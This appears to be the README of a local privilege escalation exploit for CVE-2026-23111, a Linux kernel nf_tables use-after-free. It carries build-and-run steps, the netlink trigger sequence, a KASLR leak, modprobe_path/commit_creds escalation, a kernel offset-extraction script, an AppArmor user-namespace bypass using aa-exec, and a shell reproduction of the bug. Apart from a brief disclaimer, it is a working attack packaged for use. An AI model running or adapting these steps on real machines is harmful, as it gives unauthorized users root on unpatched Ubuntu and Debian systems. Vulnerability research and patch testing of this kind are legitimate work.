## https://sploitus.com/exploit?id=58E729A1-1305-508A-A366-27ECA7ADF232
# CVE-2026-23111 Auto-Root (VM Testing)
Local privilege escalation exploit for **CVE-2026-23111**: a Linux kernel `nf_tables` use-after-free caused by an inverted `!` in `nft_map_catchall_activate()`.
**Authorized VM/lab use only.** Do not run on production systems.
## Vulnerability Summary
| Item | Detail |
|------|--------|
| Bug | `nft_map_catchall_activate()` skips inactive catchall on abort |
| Effect | `chain->use` not restored → refcount drained → chain freed while still referenced (UAF) |
| Requirement | Unprivileged user namespaces (to get `CAP_NET_ADMIN` over a fresh netns) + `nf_tables` available |
| Targets | Ubuntu 22.04/24.04, Debian Bookworm (pre-patch kernels) |
## Quick Start (on vulnerable Linux VM)
```bash
# Copy project to VM
scp -r cve-2026-23111-exploit user@vm:~/
# On VM
cd ~/cve-2026-23111-exploit
chmod +x run.sh extract_offsets.sh
./run.sh
```
Or manually:
```bash
sudo apt install gcc libc6-dev make   # Debian/Ubuntu (make is needed for the Makefile)
make
./cve-2026-23111 -p ubuntu-22.04
```
## 4-Batch Trigger (critical)
Matches the Exodus Intelligence write-up and the FuzzingLabs reproduction:
1. **Batch 1**: `DELSET triggermap` + `DELSET bonjour` (second delete fails, so the whole batch goes through the abort path)
2. **Batch 2**: `NEWCHAIN dummy` (toggle generation cursor)
3. **Batch 3**: `DELSET holdmap` (clean delete)
4. **Batch 4**: `DELCHAIN victim` (chain freed while `triggermap` still holds a dangling GOTO reference → UAF)
## Exploitation Stages
1. **UAF trigger**: the 4-batch netlink sequence above
2. **KASLR bypass**: spray `seq_operations` via `open("/proc/self/stat")` into the freed slot, leak the pointer via `NFT_MSG_GETRULE`
3. **Root**: `modprobe_path` overwrite (needs correct offsets) or `commit_creds` ROP
## Kernel Offsets
`offsets.h` ships example offsets for Ubuntu 22.04 and Debian Bookworm. They are only valid for the exact kernel build they were taken from; **you must verify them on your VM.**
Generate local offsets (as root on VM):
```bash
sudo sh -c 'echo 0 > /proc/sys/kernel/kptr_restrict'
sudo ./extract_offsets.sh > offsets.local.h
make local
./cve-2026-23111
```
For ROP gadgets, run `ropper`/`rp++` on an uncompressed `vmlinux` (the `/boot/vmlinuz-*` image is compressed; unpack it first with the kernel tree's `scripts/extract-vmlinux`).
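The point of `extract_offsets.sh` is that raw `/proc/kallsyms` addresses are useless across reboots: KASLR slides the whole image, so what the exploit needs is each symbol's distance from `_text`, which it adds to the text address it leaks at runtime. The script below is an added example, not the project's own `extract_offsets.sh`; it runs on a constructed kallsyms sample (not from a real kernel), and the `OFF_*` macro names, the symbol list and the `gen_offsets_h` helper are assumptions of this example. It also handles the failure mode a practitioner hits first: with `kptr_restrict` still set, kallsyms shows all-zero addresses, and the script refuses to emit offsets instead of silently producing zeros.

```shell
#!/bin/sh
# Added example: derive KASLR-independent symbol offsets from kallsyms output.
# Offsets are relative to _text, so they survive the per-boot slide and can be
# added to a leaked text address later. Not the project's extract_offsets.sh.

# Constructed sample in /proc/kallsyms format ("addr type name"); not a real kernel.
SAMPLE_KALLSYMS='ffffffff9b200000 T _text
ffffffff9b2b4f10 T commit_creds
ffffffff9b2b5260 T prepare_kernel_cred
ffffffff9b3c2e30 t single_start
ffffffff9cc8b2a0 D modprobe_path'

# Constructed sample of what an unprivileged reader sees with kptr_restrict=1.
SAMPLE_KPTR_RESTRICTED='0000000000000000 T _text
0000000000000000 T commit_creds'

# Address of a symbol (exact name match, first hit wins); fails if absent.
kallsyms_addr() {
    sym=$1; data=$2
    printf '%s\n' "$data" | awk -v s="$sym" '$3 == s { print $1; exit }' | grep . || return 1
}

# Offset of a symbol from _text, printed as hex.
# Returns 1 if a symbol is missing, 2 if kallsyms is zeroed (kptr_restrict).
# x86_64 kernel addresses all start with ffffffff; that prefix is dropped so the
# subtraction fits comfortably in 32 bits on any POSIX sh arithmetic.
kallsyms_offset() {
    sym=$1; data=$2
    base=$(kallsyms_addr _text "$data") || return 1
    case "$base" in 0000000000000000) return 2 ;; esac
    addr=$(kallsyms_addr "$sym" "$data") || return 1
    printf '0x%x\n' $(( 0x${addr#ffffffff} - 0x${base#ffffffff} ))
}

# Emit a C header fragment (OFF_<SYMBOL> macros, an assumed naming scheme) for
# the symbols the exploit stages need; fail loudly rather than emit a partial file.
gen_offsets_h() {
    data=$1
    for sym in commit_creds prepare_kernel_cred modprobe_path single_start; do
        off=$(kallsyms_offset "$sym" "$data") || { echo "cannot resolve $sym (rc=$?)" >&2; return 1; }
        printf '#define OFF_%s %s\n' "$(printf '%s' "$sym" | tr a-z A-Z)" "$off"
    done
}

gen_offsets_h "$SAMPLE_KALLSYMS"
# Real use (as root, after kernel.kptr_restrict=0):
#   gen_offsets_h "$(cat /proc/kallsyms)" > offsets.local.h
```

Because the offsets are relative, the leak stage only has to recover one text address (the page leaks a `seq_operations` function pointer such as `single_start`); subtracting `OFF_SINGLE_START` from the leaked value gives the live `_text`, and every other target is that base plus its offset.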
## Ubuntu 24.04 Note
Ubuntu 24.04 restricts unprivileged user namespaces through AppArmor (`sysctl kernel.apparmor_restrict_unprivileged_userns` reports `1`, and `unshare -Ur true` fails). Bypass by running under a profile that is still allowed to create user namespaces:
```bash
aa-exec -p trinity -- ./run.sh
```
## Files
| File | Purpose |
|------|---------|
| `exploit.c` | Main exploit (trigger + leak + escalate) |
| `nft_helpers.c/h` | Netlink nftables batch helpers |
| `offsets.h` | Example kernel symbol offsets |
| `extract_offsets.sh` | Dump symbols from `/proc/kallsyms` |
| `Makefile` | Build static binary |
| `run.sh` | One-shot compile + run |
## Verify Vulnerability (no exploit)
```bash
unshare -Urmin sh -c '
nft add table inet t
nft add chain inet t c
# Quote the element/map bodies: otherwise sh glob-expands "*" and eats the ";"
nft add map inet t m "{ type ipv4_addr : verdict ; }"
nft add element inet t m "{ * : goto c }"
nft add map inet t trig "{ type ipv4_addr : verdict ; }"
nft add element inet t trig "{ * : goto c }"
# One batch: deleting the nonexistent map fails, so the whole batch is aborted
nft -f - <<EOF
delete map inet t trig
delete map inet t nope
EOF
nft delete map inet t m
nft delete chain inet t c
nft list maps
'
```
A corrupted `goto` verdict in the listing of the surviving map `trig` (its catchall element still references the freed chain) indicates the UAF.
## References
- [Exodus Intelligence: Off By !](https://blog.exodusintel.com/2026/06/08/off-by-exploiting-a-use-after-free-in-the-linux-kernel/)
- [FuzzingLabs reproduction](https://fuzzinglabs.com/repro-cve-2026-23111/)
- [NVD CVE-2026-23111](https://nvd.nist.gov/vuln/detail/CVE-2026-23111)
## Caveats
- Offsets are **kernel-build specific** (not just distro-specific); always run `extract_offsets.sh` on the target kernel
- Full ROP (`commit_creds`) requires additional heap shaping not fully automated here
- Patched kernels (post 2026-02-05) are **not vulnerable**
- Stability ~80–99% depending on system load (per Exodus)